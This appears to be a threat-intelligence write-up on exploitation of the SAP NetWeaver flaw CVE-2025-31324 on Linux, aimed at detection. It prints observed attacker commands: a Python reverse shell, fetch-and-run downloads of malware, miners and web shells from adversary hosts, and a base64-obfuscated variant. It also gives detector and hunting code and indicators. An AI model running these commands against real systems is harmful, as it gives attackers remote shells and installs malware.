Red Canary has observed activity exploiting a newly documented unrestricted file upload vulnerability in SAP NetWeaver Visual Composer, a tool business analysts use to build enterprise applications. While other security vendors have reported widespread exploitation in Windows environments, Red Canary has also directly observed exploitation of this vulnerability on Linux systems.
CVE-2025-31324 has received a critical CVSS rating of 10.0, and we encourage patching immediately.
Red Canary Co-Founder Keith McCammon broke down Red Canary’s visibility into this exploitation in the April 29 episode of Office Hours:
What is CVE-2025-31324?
This vulnerability allows unrestricted file uploads to a SAP NetWeaver server. By exploiting it, an adversary can upload web shells and other arbitrary content and execute it on the SAP NetWeaver server. SAP released a security advisory, visible to customers of its support portal, with additional guidance on patching the affected components.
The vulnerability affects instances of SAP with NetWeaver 7.xx installed, including the service packs for that product.
Exploitation behavior on Linux
Public exploitation details are available for this vulnerability, and we are actively monitoring sources for additional information. Red Canary’s behavior-based approach to creating analytics enables detection of post-exploitation activity regardless of the vulnerability exploited, and that approach has identified instances of SAP NetWeaver exploitation in customer environments.
In one instance of exploitation, Red Canary observed Python reverse shell code spawning from known SAP processes:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("5.161.153[.]112",8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This command connects back to the host at 5.161.153[.]112 on TCP port 8443, redirects standard input, output, and error of the process to that socket, and starts an interactive /bin/sh, so the adversary can issue arbitrary commands and execute them in a shell on the affected Linux system.
In other instances of exploitation, we observed the manipulation of web shell files followed by the download and execution of additional tools:
mv ../apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp ../apps/sap.com/irj/servlet_jsp/irj/root/usage.jsp
This command renames the helper.jsp file to usage.jsp. Presumably this helps prevent other adversaries from using the helper.jsp web shell, as that file name has been reported previously in posts from other vendors.
These commands downloaded files from adversary-controlled AWS S3 buckets before attempting to execute them. Note the wget ... || curl ... construction: if wget is missing or fails, the same file is fetched with curl instead, so detection logic should cover both downloaders. Additional investigation in VirusTotal revealed these S3 buckets were used to deploy KrustyLoader malware in recent weeks.
wget hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk -O /tmp/1 || curl -o /tmp/1 hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
wget hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX -O /tmp/1 || curl -o /tmp/1 hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
This command downloaded a script from an adversary-controlled Cloudflare Tunnel and piped it directly into bash; the -k and --no-check-certificate flags disable TLS certificate validation, so a self-signed certificate on the tunnel endpoint does not block the download. Unfortunately we could not retrieve the delivered payload for additional investigation.
(curl -sk hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh
This command downloaded and ran Supershell malware from adversary-controlled object storage in Alibaba Cloud (Aliyun).
curl -O hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
This command downloaded script contents that an adversary later attempted to execute. If successful, the script would install XMRig cryptocurrency miner to an affected server.
curl -o /tmp/8bq.sh hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
These final commands downloaded web shells from various adversary-controlled infrastructure and wrote them to an affected SAP server for persistent access. Note the leading dot in .webhelper.jsp, which hides the file from a default ls listing and from glob patterns that skip dotfiles.
curl -o /usr/sap/…/servlet_jsp/_default/root/forwardsap.jsp hxxps[://]devocional[.]click/download/forwardsap.jsp
curl hxxp[://]temp[.]sh/vvgtW/webhelper -o webhelp.jsp
curl hxxp[://]update.zoho-software[.]com:443/webhelper -o /usr/sap/…/servlet_jsp/irj/root/.webhelper.jsp
In these cases, the adversary also employed Base64 encoding of the commands to evade casual observation with process monitoring tools, using bash brace expansion so that the strings "base64 -d" and "bash -i" never appear with a space in the command line. The commands appeared in this form (the encoded string below decodes to the abode-dashboard-media S3 download command shown above):
bash -c {echo,d2dldCBodHRwOi8vYWJvZGUtZGFzaGJvYXJkLW1lZGlhLnMzLmFwLXNvdXRoLTEuYW1hem9uYXdzLmNvbS9CQ1lWcnJIWCAtTyAvdG1wLzEgfHwgY3VybCAtbyAvdG1wLzEgaHR0cDovL2Fib2RlLWRhc2hib2FyZC1tZWRpYS5zMy5hcC1zb3V0aC0xLmFtYXpvbmF3cy5jb20vQkNZVnJySFg=}|{base64,-d}|{bash,-i}
Detection opportunities
The following three detection opportunities are a good starting point for security teams developing coverage for the behaviors we have observed after exploitation of SAP NetWeaver:
Base64-encoded commands in shell processes
This detector looks for adversaries leveraging encoded commands in Linux shell processes to download remotely hosted files.
process == ('bash')
&&
command_includes ('base64, -d')
Curl downloading files in /tmp
This detection opportunity looks for adversaries leveraging curl to download files from a remote host into the /tmp folder.
process == ('curl')
&&
wrote/modified_executable
&&
command_includes ('/tmp')
Python scripts establishing a socket to a remote host
This pseudo-detector looks for adversaries using Python scripts to establish a socket to a remote host.
process == ('python')
&&
command_includes (' -c ' || '.socket')
&&
command_includes ('.call(' || '.spawn(')
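The three pseudo-detectors above, implemented as plain Python and run over constructed process-telemetry events. This is an added example, not Red Canary's production analytics: the event fields (process, cmdline, wrote_executable) are an assumption about what an EDR sensor exposes, the malicious sample commands are the ones observed in this report (IPs and URLs defanged as in the write-up), and the benign events are invented look-alikes to show what each condition filters out. It also decodes the {echo,<base64>} payload so an analyst sees the real download command rather than the encoded blob.

```python
"""Reference implementation of the three detection opportunities above.
Added example, not Red Canary's analytics. Event schema is an assumption;
sample malicious commands are the ones observed in the report, defanged."""
import base64
import re

# Matches both "base64 -d" and the brace-expansion form "{base64,-d}".
_B64_DECODE = re.compile(r"base64[ ,]+-d\b")
# Extracts the payload from the "{echo,<base64>}" stage of that chain.
_BRACE_B64 = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}")


def decode_brace_base64(cmdline):
    """Return the decoded payload of a {echo,<b64>}|{base64,-d} chain, or None."""
    m = _BRACE_B64.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def detect_encoded_shell(event):
    """Base64-encoded commands in shell processes."""
    return event["process"] == "bash" and _B64_DECODE.search(event["cmdline"]) is not None


def detect_curl_tmp(event):
    """Curl downloading files in /tmp. The wrote_executable condition keeps
    ordinary document downloads into /tmp from firing."""
    return (event["process"] == "curl"
            and event.get("wrote_executable", False)
            and "/tmp" in event["cmdline"])


def detect_python_socket(event):
    """Python scripts establishing a socket to a remote host."""
    c = event["cmdline"]
    return (event["process"].startswith("python")
            and (" -c " in c or ".socket" in c)
            and (".call(" in c or ".spawn(" in c))


DETECTORS = {
    "base64_shell": detect_encoded_shell,
    "curl_tmp": detect_curl_tmp,
    "python_socket": detect_python_socket,
}


def run_detectors(events):
    """Return one (event_index, detector_name, decoded_payload_or_None) per hit."""
    hits = []
    for i, ev in enumerate(events):
        for name, fn in DETECTORS.items():
            if fn(ev):
                payload = decode_brace_base64(ev["cmdline"]) if name == "base64_shell" else None
                hits.append((i, name, payload))
    return hits


# Constructed telemetry: events 0-2 are the observed commands, 3-5 are benign look-alikes.
SAMPLE_EVENTS = [
    {"process": "bash", "wrote_executable": False,
     "cmdline": "bash -c {echo,d2dldCBodHRwOi8vYWJvZGUtZGFzaGJvYXJkLW1lZGlhLnMzLmFwLXNvdXRoLTEu"
                "YW1hem9uYXdzLmNvbS9CQ1lWcnJIWCAtTyAvdG1wLzEgfHwgY3VybCAtbyAvdG1wLzEgaHR0cDov"
                "L2Fib2RlLWRhc2hib2FyZC1tZWRpYS5zMy5hcC1zb3V0aC0xLmFtYXpvbmF3cy5jb20vQkNZVnJySFg=}"
                "|{base64,-d}|{bash,-i}"},
    {"process": "curl", "wrote_executable": True,
     "cmdline": "curl -o /tmp/8bq.sh hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh"},
    {"process": "python3", "wrote_executable": False,
     "cmdline": ("python3 -c 'import socket,subprocess,os;"
                 "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                 "s.connect((\"5.161.153[.]112\",8443));"
                 "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
                 "p=subprocess.call([\"/bin/sh\",\"-i\"]);'")},
    {"process": "curl", "wrote_executable": False,   # document download, not executable
     "cmdline": "curl -o /tmp/report.pdf https://intranet.example/report.pdf"},
    {"process": "python3", "wrote_executable": False,  # -c without a socket or call()
     "cmdline": "python3 -c 'print(sum(range(10)))'"},
    {"process": "bash", "wrote_executable": False,
     "cmdline": "bash -c 'cat /etc/os-release'"},
]

if __name__ == "__main__":
    for idx, name, payload in run_detectors(SAMPLE_EVENTS):
        print(f"[{name}] event {idx}: {SAMPLE_EVENTS[idx]['cmdline'][:70]}")
        if payload:
            print("    decoded:", payload)
```

Only the three observed commands fire; the /tmp document download is held back by the executable-write condition and the one-liner print by the missing .call(). The base64 pattern deliberately accepts the comma separator from brace expansion; extend it to cover --decode and openssl base64 -d if those appear in your telemetry.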
Along with patching, we recommend examining SAP web server access logs for additional evidence of CVE-2025-31324 exploitation, specifically looking for unusual requests to the API endpoint /developmentserver/metadatauploader. If possible, consider disallowing access to that API endpoint from external networks. To hunt for additional evidence of web shell uploads, organizations can search for unexpected JSP files within these folders on SAP servers (shown with Windows separators; on Linux the same directories sit under the instance's j2ee/cluster path with forward slashes):
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
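A small hunting script that applies the two checks just described: it pulls requests to the /developmentserver/metadatauploader endpoint out of access-log lines, and it lists JSP files in the three servlet_jsp directories that are not in a known-good baseline. This is an added example, not Red Canary's or SAP's tooling. The log lines are constructed in NCSA combined format (your SAP HTTP access log may be configured differently, so adjust the regex), the baseline set is an assumption you should build from a clean install, and the demo directory tree is created in a temp directory purely to exercise the code.

```python
"""Hunting helpers for CVE-2025-31324 follow-up. Added example, not vendor tooling.
Assumptions: NCSA combined access-log layout, an assumed baseline of known JSPs,
and a constructed directory tree standing in for a real SAP instance."""
import os
import re
import tempfile

UPLOADER = "/developmentserver/metadatauploader"

# NCSA combined: ip ident user [timestamp] "METHOD path proto" status size ...
_NCSA = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def suspicious_requests(log_lines):
    """Return (ip, method, path, status) for each request to the uploader endpoint.
    Uploads are POSTs; GETs are usually probes, but both are returned for triage."""
    hits = []
    for line in log_lines:
        m = _NCSA.match(line)
        if m and m.group("path").split("?", 1)[0].lower() == UPLOADER:
            hits.append((m.group("ip"), m.group("method"), m.group("path"), int(m.group("status"))))
    return hits


# The directories named in the write-up, with POSIX separators for Linux hosts.
JSP_DIRS = (
    "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root",
    "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work",
    "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync",
)

# Assumed known-good file; build the real baseline from a clean install of your release.
DEMO_BASELINE = frozenset({"index.jsp"})


def find_unexpected_jsp(base, baseline):
    """List .jsp files under the watched directories that are not in the baseline.
    os.scandir is used rather than glob so dotfiles such as .webhelper.jsp are seen."""
    found = []
    for rel in JSP_DIRS:
        d = os.path.join(base, rel)
        if not os.path.isdir(d):
            continue
        for entry in os.scandir(d):
            if entry.is_file() and entry.name.lower().endswith(".jsp") and entry.name not in baseline:
                found.append(os.path.join(rel, entry.name))
    return sorted(found)


def build_demo_tree():
    """Create a throwaway tree mimicking an affected server (constructed data)."""
    base = tempfile.mkdtemp(prefix="sapjsp-")
    root, work, sync = (os.path.join(base, d) for d in JSP_DIRS)
    for d in (root, sync):                      # sync's parent is work
        os.makedirs(d, exist_ok=True)
    for path in (os.path.join(root, "index.jsp"),        # baseline file
                 os.path.join(root, "usage.jsp"),        # renamed web shell from the report
                 os.path.join(root, ".webhelper.jsp"),   # hidden web shell from the report
                 os.path.join(sync, "404_error.jsp")):   # web shell name from the IOC list
        with open(path, "w") as fh:
            fh.write("<%-- constructed placeholder --%>\n")
    return base


# Constructed access-log sample: a normal portal request, then a probe and an upload.
SAMPLE_LOG = [
    '10.0.0.8 - - [29/Apr/2025:10:01:02 +0000] "GET /irj/portal HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Apr/2025:10:05:41 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 311',
    '203.0.113.9 - - [29/Apr/2025:10:05:43 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 91',
]

if __name__ == "__main__":
    for ip, method, path, status in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {status}")
    for rel in find_unexpected_jsp(build_demo_tree(), DEMO_BASELINE):
        print("unexpected JSP:", rel)
```

Point find_unexpected_jsp at the SAP instance directory that contains j2ee/cluster and replace DEMO_BASELINE with the file names from a clean system; a 200 response to a POST on the uploader endpoint from an external address is the log entry most worth chasing.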
Indicators
IP addresses
5.161.153[.]112
23.95.123[.]5
Domains
brandnav-cms-storage.s3.amazonaws[.]com
abode-dashboard-media.s3.ap-south-1.amazonaws[.]com
overseas-recognized-athens-oakland.trycloudflare[.]com
ocr-freespace.oss-cn-beijing.aliyuncs[.]com
devocional[.]click
update.zoho-software[.]com
URLs
hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js
hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
hxxps[://]devocional[.]click/download/forwardsap.jsp
hxxp[://]temp[.]sh/vvgtW/webhelper
hxxp[://]update.zoho-software[.]com:443/webhelper
Malicious filenames
config.sh
/tmp/0
/tmp/1
.webhelper.jsp
.h.jsp
usage.jsp
usage1.jsp
helper.jsp
404_error.jsp
webhelp.jsp
forwardsap.jsp
/tmp/8bq.sh
1.sh